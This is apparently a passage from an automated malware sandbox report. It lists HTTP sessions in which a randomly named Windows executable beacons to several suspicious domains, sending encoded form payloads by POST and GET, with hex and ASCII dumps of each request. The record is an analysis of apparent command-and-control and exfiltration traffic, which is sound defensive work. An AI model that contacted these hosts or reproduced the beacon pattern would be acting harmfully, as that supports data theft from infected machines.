                                                        Data Raw: 31 48 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 71 47 4b 5a 4b 53 74 6b 71 6a 68 36 52 4e 4b 2f 4f 62 79 5a 37 64 33 69 65 6d 4f 63 55 73 6e 6b 77 3d 3d
                                                        Data Ascii: 1H=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgWqGKZKStkqjh6RNK/ObyZ7d3iemOcUsnkw==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.4497603.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:01.847518921 CET842OUTPOST /79tr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.beingandbecoming.ltd
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 219
                                                        Cache-Control: no-cache
                                                        Origin: http://www.beingandbecoming.ltd
                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 36 66 76 4a 70 79 57 72 38 48 79 31 68 6f 35 43 64 64 34 38 49 75 64 4c 46 59 75 55 77 54 69 38 44 55 65 57 5a 51 62 73 70 4b 7a 42 39 4a 43 69 4a 76 56 49 44 50 42 6b 32 63 4d 37 33 32 34 65 4d 52 37 4f 36 37 69 31 5a 4f 56 58 63 49 66 4d 2f 36 6f 38 34 75 6c 41 34 43 4f 6e 41 4b 30 48 4e 79 51 4b 41 63 2b 49 49 65 57 79 52 54 49 4f 42 4e 47 6d 6f 4f 55 50 6a 44 53 61 57 33 75 75 71 42 2f 58 41 51 75 2f 36 6c 4c 37 35 45 2f 5a 76 36 52 58 52 75 2f 31 72 39 54 57 50 2f 7a 50 6e 51 44 33 48 43 5a 44 7a 73 55 35 34 3d
                                                        Data Ascii: 1H=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbS6fvJpyWr8Hy1ho5Cdd48IudLFYuUwTi8DUeWZQbspKzB9JCiJvVIDPBk2cM7324eMR7O67i1ZOVXcIfM/6o84ulA4COnAK0HNyQKAc+IIeWyRTIOBNGmoOUPjDSaW3uuqB/XAQu/6lL75E/Zv6RXRu/1r9TWP/zPnQD3HCZDzsU54=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        3192.168.2.4497713.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:04.387840033 CET10924OUTPOST /79tr/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.beingandbecoming.ltd
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 10299
                                                        Cache-Control: no-cache
                                                        Origin: http://www.beingandbecoming.ltd
                                                        Referer: http://www.beingandbecoming.ltd/79tr/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 39 4e 47 63 58 33 66 67 48 58 6d 34 66 72 68 33 30 32 50 4d 52 36 79 77 2f 56 6a 53 62 53 43 66 75 2b 42 79 5a 73 41 48 7a 31 68 6f 36 43 64 63 34 38 49 4a 64 4c 39 63 75 55 73 44 69 2b 4c 55 66 30 52 51 50 4a 46 4b 6b 52 39 4a 4f 43 4a 75 4b 59 43 4e 42 6b 6d 69 4d 37 6e 32 34 65 4d 52 37 4d 53 37 72 47 42 4f 47 6e 63 50 4c 63 2f 32 73 38 35 35 6c 44 4a 33 4f 6e 30 77 30 7a 35 79 51 71 51 63 38 64 55 65 4f 69 52 52 45 75 41 51 47 6d 6b 4e 55 4c 44 6c 53 5a 4b 4a 75 70 71 42 7a 67 52 7a 71 2b 65 76 49 71 6c 59 68 72 33 45 49 32 42 37 7a 6a 4c 36 66 44 76 67 70 38 37 72 4f 57 6d 63 4a 6d 6a 54 44 66 2f 4f 79 4c 6e 4d 65 31 33 4c 68 32 74 32 47 74 5a 63 61 70 4d 56 35 7a 30 73 49 6a 63 53 30 6e 45 44 34 53 6b 42 59 49 62 6b 38 65 55 66 4a 39 77 77 72 46 4d 5a 38 61 47 61 51 36 6f 37 42 79 6b 67 2b 4d 74 6b 6d 53 71 4c 2b 6b 31 2b 4f 44 52 2b 43 53 4f 67 76 76 71 48 58 57 4c 69 2b 70 71 36 39 50 56 73 44 2f 74 48 73 33 6d 62 70 41 39 59 43 65 4b 4f 72 2b 71 [TRUNCATED]
                                                        Data Ascii: 1H=iDQU2KTRHkQI9NGcX3fgHXm4frh302PMR6yw/VjSbSCfu+ByZsAHz1ho6Cdc48IJdL9cuUsDi+LUf0RQPJFKkR9JOCJuKYCNBkmiM7n24eMR7MS7rGBOGncPLc/2s855lDJ3On0w0z5yQqQc8dUeOiRREuAQGmkNULDlSZKJupqBzgRzq+evIqlYhr3EI2B7zjL6fDvgp87rOWmcJmjTDf/OyLnMe13Lh2t2GtZcapMV5z0sIjcS0nED4SkBYIbk8eUfJ9wwrFMZ8aGaQ6o7Bykg+MtkmSqL+k1+ODR+CSOgvvqHXWLi+pq69PVsD/tHs3mbpA9YCeKOr+qU5SRTUqofRc/uBxZgyybUf6E4V/aHG5QbsIu9YaK99lyu0CKm7uASLa7LDeiW/RYhRYFz3JRXCiTj9Ef6aP/71BaHIzNBaBV2ArDLuyrT3JwbxIMi3UAFntiIkGRf3jybTxc7/3HTg6kfj65W15qsQMZrR8ceoksUx3a3RuQ5boWDCvnIi8q1WGhsFJXyyzz0UIVWLOoJhbBusdzqmeu22TdZ1p+8MP19aiAI+RcfITlzHu611Ud6T1oxElPqRFmkG/XKFjHxlqtiq0+FRFGsLMIBcL+GG9rG/6ewoUJU3MJ+43eGJow46P5oyeYHS24dHl31xclUA0+N4JFhm32VCPb4buPiJvi/CpwAmrYPEQdauGMh7u+YDOHqGQCxoET3td8/kjPGai2//RasEWvKIHJx2bdU2jL4gCNmW1gPneYqmmswoxq/V9BD/dpMd6EInt7KL3ld8zUjwrnFgRLBGLKWG8lXUPgQ7vlcTJFtx/dp5dqSe0EeOj8/+MuAWTWP5i74FZPo+KtSQMNHgnO1ikhZuzlc7h1v/2beX4AwRAePu0CN+3tDCb1kIFIZeyOw4+cTL0CIvyYyYjnNVdagEWS22m1QZdWwRnbF46wXRJ0E9xbNEVY39Nkv93F6BvIeZpEjI/kavKKB4rWPq1utiGZv0K8oDcFcN [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.4497863.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:06.929385900 CET536OUTGET /79tr/?1H=vB4016rwfH0Mxta3WHz8fHaIVIRa7jPne8uh+mnoHReWloNmM7dp4Fgr6wtK7PtcWtNvsE0Cpt3tQWtVQrZP8AE/MzANUKvMVkOqK7vCy8Yr4bj2qmMHLkQ=&jD=VzTtTZ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.beingandbecoming.ltd
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.449814203.161.49.193802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:12.895323038 CET813OUTPOST /hxmz/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.futurevision.life
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 199
                                                        Cache-Control: no-cache
                                                        Origin: http://www.futurevision.life
                                                        Referer: http://www.futurevision.life/hxmz/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 45 72 38 6d 38 70 61 42 53 33 46 2f 62 66 6c 69 34 63 2f 4b 72 41 75 39 66 72 51 63 42 70 71 4c 5a 56 4b 58 6d 46 6b 73 57 42 6a 45 42 7a 49 73 7a 2f 52 67 71 47 6c 36 76 6e 4f 77 65 48 33 49 4e 45 45 4d 5a 45 72 63 75 64 51 72 64 4e 72 39 35 53 69 4c 78 43 34 73 58 6b 65 6c 64 51 6f 46 34 38 39 2f 58 6f 54 63 70 79 42 4d 76 61 43 64 51 56 35 4d 6e 72 48 4d 62 6f 47 61 67 73 55 6f 61 39 35 37 53 39 48 65 70 76 52 74 63 68 73 79 51 56 4e 4c 52 57 42 31 35 55 47 71 59 41 6e 6a 6d 6e 66 45 31 2b 4d 71 61 43 4d 52 36 30 41 4c 74 35 52 43 65 51 3d 3d
                                                        Data Ascii: 1H=8cwN9mJXk9DUEr8m8paBS3F/bfli4c/KrAu9frQcBpqLZVKXmFksWBjEBzIsz/RgqGl6vnOweH3INEEMZErcudQrdNr95SiLxC4sXkeldQoF489/XoTcpyBMvaCdQV5MnrHMboGagsUoa957S9HepvRtchsyQVNLRWB15UGqYAnjmnfE1+MqaCMR60ALt5RCeQ==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.2.449825203.161.49.193802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:15.474059105 CET833OUTPOST /hxmz/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.futurevision.life
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 219
                                                        Cache-Control: no-cache
                                                        Origin: http://www.futurevision.life
                                                        Referer: http://www.futurevision.life/hxmz/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 36 4c 65 78 61 58 6e 45 6b 73 52 42 6a 45 4b 54 49 70 33 2f 52 76 71 47 70 79 76 6b 57 77 65 48 6a 49 4e 41 55 4d 59 7a 2f 66 38 64 51 70 57 74 72 2f 32 79 69 4c 78 43 34 73 58 6b 61 50 64 51 77 46 37 4e 4e 2f 56 4a 54 64 6b 53 42 54 6f 61 43 64 42 46 34 4c 6e 72 48 4c 62 74 65 30 67 71 59 6f 61 34 64 37 54 6f 7a 66 6a 76 52 6a 54 42 74 32 44 57 6f 31 4a 57 49 5a 79 53 65 50 54 77 58 37 71 42 53 65 6b 50 74 39 49 43 6f 69 6e 7a 4a 2f 67 36 73 4c 46 62 51 6c 59 33 4b 42 73 73 53 70 64 79 69 4c 66 2b 2f 71 2b 70 51 3d
                                                        Data Ascii: 1H=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/6LexaXnEksRBjEKTIp3/RvqGpyvkWweHjINAUMYz/f8dQpWtr/2yiLxC4sXkaPdQwF7NN/VJTdkSBToaCdBF4LnrHLbte0gqYoa4d7TozfjvRjTBt2DWo1JWIZySePTwX7qBSekPt9ICoinzJ/g6sLFbQlY3KBssSpdyiLf+/q+pQ=
                                                        Nov 19, 2024 03:25:16.240983963 CET533INHTTP/1.1 404 Not Found
                                                        Date: Tue, 19 Nov 2024 02:25:16 GMT
                                                        Server: Apache
                                                        Content-Length: 389
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.2.449840203.161.49.193802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:18.082515001 CET10915OUTPOST /hxmz/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.futurevision.life
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 10299
                                                        Cache-Control: no-cache
                                                        Origin: http://www.futurevision.life
                                                        Referer: http://www.futurevision.life/hxmz/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 38 63 77 4e 39 6d 4a 58 6b 39 44 55 57 2f 41 6d 76 34 61 42 61 33 46 38 65 66 6c 69 32 38 2f 4f 72 41 69 39 66 71 55 79 42 2f 79 4c 65 47 79 58 6d 6a 34 73 51 42 6a 45 4a 54 49 6f 33 2f 52 32 71 47 68 32 76 6a 65 47 65 42 76 49 4e 69 63 4d 66 47 44 66 32 64 51 70 4c 39 72 2b 35 53 69 65 78 43 6f 67 58 6b 4b 50 64 51 77 46 37 4f 56 2f 53 59 54 64 6d 53 42 4d 76 61 43 76 51 56 34 76 6e 76 72 39 62 74 54 42 67 61 34 6f 61 65 39 37 65 2b 66 66 76 76 52 32 51 42 74 51 44 57 55 51 4a 57 55 6a 79 53 43 78 54 7a 4c 37 70 6b 4b 49 77 66 31 6d 64 44 68 77 6b 51 55 55 6a 34 49 6f 41 71 67 6d 58 56 54 62 31 4f 58 4b 5a 42 48 55 45 73 6a 33 73 2b 4f 47 35 32 31 71 4d 7a 62 58 71 5a 33 43 57 63 42 48 49 6b 75 6e 73 6e 66 6e 62 5a 78 52 6a 4f 59 67 68 6d 6d 31 52 5a 39 77 38 6b 6f 52 6d 45 4e 51 59 77 68 45 74 43 55 30 30 45 64 77 30 34 48 47 35 72 39 42 66 4e 37 74 4e 73 38 66 38 6a 67 59 6e 32 30 6f 50 37 34 4e 6c 78 39 77 4c 47 41 35 45 65 30 44 59 46 4d 79 52 38 6c 57 7a 57 58 2f 6a 47 55 6d 4c 48 45 [TRUNCATED]
                                                        Data Ascii: 1H=8cwN9mJXk9DUW/Amv4aBa3F8efli28/OrAi9fqUyB/yLeGyXmj4sQBjEJTIo3/R2qGh2vjeGeBvINicMfGDf2dQpL9r+5SiexCogXkKPdQwF7OV/SYTdmSBMvaCvQV4vnvr9btTBga4oae97e+ffvvR2QBtQDWUQJWUjySCxTzL7pkKIwf1mdDhwkQUUj4IoAqgmXVTb1OXKZBHUEsj3s+OG521qMzbXqZ3CWcBHIkunsnfnbZxRjOYghmm1RZ9w8koRmENQYwhEtCU00Edw04HG5r9BfN7tNs8f8jgYn20oP74Nlx9wLGA5Ee0DYFMyR8lWzWX/jGUmLHEiJnOq1XO0Lm5IMfIGlJiHWXBuMNEty6S8KUOXVqOtR0cWBXMkQNVHRelIf4gqO83fhO6q7m+2YuMqI/QpmziHqHosEICZZUiP6Q+fiPvAcCEQ/hDHWxopKz3Re6qCUNBZFEQ74Ybtu6grRgWEeiUT7OTqTSKpXXjDrQPxOjv0zVhhD4pI3YoModpcnGyBtjBDOQ7mw+26Rlt0bqiBh0Yus195lhYtNuzQf6SKXwVU0rpDjlMLibBgqW7AvlKhOxv8gRdjuSPgmS7rK1AP9hVxTzRCBIDpP5nC5ye1ScHnOBGDQkOQVC85y1dM/OTHRndJ54PlAz4f4sPLmSM1YGvoW9wxz9lQVdwGYk8UgKqX98E9FOLSLsJHud5AU7FLtrYRPQaF7+C7p2ep10F9nNiZnZMHQ1JnjmWqYaedDbcw+UFBfL1woxWJcyugq4ePnLxEEo5jxXeWlY8jOTAavWG/c0VJOxLT3lOjuqH6OonhPDTRHachL96tFA5IgEskVlky+nXMwtnr5oA7IQEaQ9KwyT2USUHulevX79EFzQ1UFzZSDwZnNcohC/PJO+CUW2yKYe3mY5pgZEJOP5kiYbKbEyJji3h9sh72dHv7HbGlCM2U0O5kkPaMEFh/OrNG1urDCn4I/E+l3RADQzmOVqtgyjqQH5UD4ZZl2 [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.2.449852203.161.49.193802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:20.679512024 CET533OUTGET /hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.futurevision.life
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.4498783.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:26.509589911 CET819OUTPOST /slxp/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.schedulemassage.xyz
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 199
                                                        Cache-Control: no-cache
                                                        Origin: http://www.schedulemassage.xyz
                                                        Referer: http://www.schedulemassage.xyz/slxp/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 67 49 50 2b 59 57 57 6b 71 55 59 61 48 4f 42 5a 33 2b 32 69 6d 51 56 2f 41 4c 35 6d 68 39 36 6f 6e 69 69 34 71 78 52 54 42 36 6f 41 50 56 4b 4b 54 6d 46 69 61 2b 59 4d 53 6c 75 52 35 43 45 63 4e 4e 6d 52 75 4a 5a 46 33 74 6f 4b 6e 61 69 49 77 58 36 71 7a 72 65 59 44 6e 73 4e 72 6d 49 45 62 6d 2b 51 4d 57 65 36 53 5a 6e 5a 6c 35 42 41 62 61 42 71 4a 54 7a 64 31 6e 68 51 6a 65 5a 4f 69 79 55 59 32 61 76 35 4d 2f 38 47 59 79 33 66 6a 35 76 70 57 30 43 37 49 6a 54 56 43 64 39 59 79 78 4a 37 4e 38 49 65 7a 4f 31 2b 64 75 30 36 41 55 4a 4a 67 67 3d 3d
                                                        Data Ascii: 1H=dp+M27OzYBUBgIP+YWWkqUYaHOBZ3+2imQV/AL5mh96onii4qxRTB6oAPVKKTmFia+YMSluR5CEcNNmRuJZF3toKnaiIwX6qzreYDnsNrmIEbm+QMWe6SZnZl5BAbaBqJTzd1nhQjeZOiyUY2av5M/8GYy3fj5vpW0C7IjTVCd9YyxJ7N8IezO1+du06AUJJgg==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.4498923.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:29.056792974 CET839OUTPOST /slxp/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.schedulemassage.xyz
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 219
                                                        Cache-Control: no-cache
                                                        Origin: http://www.schedulemassage.xyz
                                                        Referer: http://www.schedulemassage.xyz/slxp/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                        Data Raw: 31 48 3d 64 70 2b 4d 32 37 4f 7a 59 42 55 42 68 70 2f 2b 64 78 43 6b 6a 55 59 46 43 4f 42 5a 39 65 33 72 6d 51 70 2f 41 4b 4e 4d 68 76 65 6f 6e 47 75 34 34 45 74 54 41 36 6f 41 58 46 4c 41 58 6d 46 31 61 2b 55 69 53 68 6d 52 35 43 41 63 4e 4a 69 52 75 36 78 47 74 64 6f 49 75 36 69 4f 39 33 36 71 7a 72 65 59 44 6a 45 72 72 6d 51 45 62 32 75 51 4e 30 6d 35 4e 70 6e 65 69 35 42 41 52 36 42 75 4a 54 7a 6a 31 69 34 59 6a 63 68 4f 69 33 77 59 32 4c 76 2b 44 2f 39 4e 63 79 32 30 6b 34 53 51 53 55 6a 4e 48 42 2f 4f 42 59 5a 4f 7a 33 45 68 63 4e 70 4a 68 4f 52 4e 41 70 39 4f 4e 58 30 41 37 6f 43 31 62 38 53 36 75 34 75 36 71 4f 68 62 4d 77 38 35 2f 4e 6b 3d
                                                        Data Ascii: 1H=dp+M27OzYBUBhp/+dxCkjUYFCOBZ9e3rmQp/AKNMhveonGu44EtTA6oAXFLAXmF1a+UiShmR5CAcNJiRu6xGtdoIu6iO936qzreYDjErrmQEb2uQN0m5Npnei5BAR6BuJTzj1i4YjchOi3wY2Lv+D/9Ncy20k4SQSUjNHB/OBYZOz3EhcNpJhORNAp9ONX0A7oC1b8S6u4u6qOhbMw85/Nk=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.4499033.33.130.190802688C:\Program Files (x86)\RtprwRfmfLeyiHPIrdWWgUOvhRjTtftSfugzOpbdUlOVBpNYCdbvIo\cMOROZNpvCGcdz.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 19, 2024 03:25:31.606621981 CET10921OUTPOST /slxp/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.schedulemassage.xyz
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 10299
                                                        Cache-Control: no-cache
                                                        Origin: http://www.schedulemassage.xyz
                                                        Referer: http://www.schedulemassage.xyz/slxp/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
